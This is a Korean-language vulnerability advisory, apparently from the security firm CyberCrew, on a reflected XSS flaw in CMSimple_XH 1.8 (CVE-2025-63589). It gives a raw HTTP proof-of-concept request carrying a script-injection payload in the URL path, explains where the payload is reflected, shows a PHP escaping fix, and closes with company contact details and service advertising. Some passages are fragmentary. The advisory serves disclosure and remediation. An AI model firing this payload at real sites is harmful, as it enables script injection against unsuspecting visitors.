
CMSimple_XH 1.8의 반사형 XSS 개념 증명으로, 인증되지 않은 스크립트 삽입이 정화되지 않은 경로 세그먼트를 통해 발생하며, CVSS 6.1 점수 및 PHP 수정 예제를 포함합니다.
발견일: 2025년 10월 6일
제품: CMSimple_XH (오픈소스 플랫 파일 CMS)
영향 받는 버전: 1.8
CVE: CVE-2025-63589
인증 필요: 없음 (비인증)
공격 유형: 반사형 크로스 사이트 스크립팅 (XSS)
예상 CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Medium)
index.php의 프론트 컨트롤러는 동적 경로 세그먼트(템플릿/페이지 라우팅에 사용됨)를 수락하고 해당 값을 템플릿 렌더링에 전달합니다. 코드는 이러한 경로 세그먼트를 속성 및 앵커 href에 삽입하기 전에 제대로 살균하거나 HTML 인코딩하지 않습니다. 결과적으로 ">와 같은 문자와 주입된 태그(예: <script>...</script>)를 포함하는 특수하게 조작된 요청 URI가 HTML 출력에 그대로 반사되어 브라우저에서 실행됩니다.
일반적인 반사 지점은 다음과 같습니다:
action 속성 (예: 로그인/검색 폼)href 속성<nav class="locator">)인쇄 보기, 사이트맵, 로그인 등)입력이 HTML 속성 컨텍스트 및 앵커 콘텐츠 내부에 위치하기 때문에 표준 속성 인코딩이 필요하지만 누락되었습니다.
요청:
POST /cmsimplexh/index.php/gjtqw"><script>alert(1)</script>co2cu HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates/TEMPLATE-overlay_03
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 32
search=Search...&function=search

응답:


주입된 페이로드 gjtqw"><script>alert(1)</script>co2cu가 메뉴 링크, 이동 경로, 검색 폼 액션 및 바닥글 링크에 인코딩되지 않고 반사되어, 페이지가 렌더링될 때 스크립트가 실행됩니다.
$safe_segment = rawurlencode($segment); // path-safety
$action = '/cmsimplexh/index.php/' . $safe_segment;
echo '<form action="' . htmlspecialchars($action, ENT_QUOTES, 'UTF-8') . '">';
HttpOnly 아님)질문이나 상담이 있으시면 편하게 연락해 주세요.

📞 전화: 03-6853-5823
📧 메일: [email protected]
| 항목 | 내용 |
|---|---|
| 회사명 | 株式会社CyberCrew |
| 주소 | 도쿄도 지요다구 소토칸다 1-18-13 아키하바라 다이빌 6층 |
조직의 취약점을 다각도로 분석하고 최적의 개선 방안을 제안합니다.
표적형, 시나리오형, LLM 펜테스트까지 대응.
기밀 정보 유출을 조기에 탐지하고 신속하게 대응합니다.
실전적인 공격 시나리오에 기반한 방어력 평가를 실시합니다.
개발 초기 단계부터 보안을 고려한 설계를 지원합니다.
🌐 공식 사이트: https://www.cybercrew.co.jp
🕒 CyberCrew — 신뢰할 수 있는 보안 파트너.